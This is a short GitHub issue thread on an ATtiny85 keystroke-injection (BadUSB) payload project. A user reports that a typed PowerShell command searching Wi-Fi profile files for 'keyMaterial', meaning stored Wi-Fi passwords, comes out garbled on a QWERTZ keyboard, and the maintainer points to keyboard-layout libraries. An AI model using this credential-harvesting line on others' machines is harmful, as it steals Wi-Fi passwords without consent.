### ISSUE TITLE
weird command execution

### ISSUE THREAD

**Issue by SalzbartIII** [MTK911/Attiny85#20]
Hi,

when executing the commads which where entered by the Attiny are not quiet similar to the downloaded payload.
for e.g the line:
DigiKeyboard.println("powershell Select-String -Path Wi*.xml -Pattern 'keyMaterial' > Wi-Fi-PASS")
is executed with:
powershell SelectßString ßPath Wi(.xml ßPattern äkezMaterialä : WißFißPASS
Maybe QWERTZ and QWERTY is a thing here?

**Comment by MTK911** [comment]
Hello,

It means you have a different language set on keyboard. Please use appropriate keyboard layout library for reference please see issue #2   #5 
Thanks.
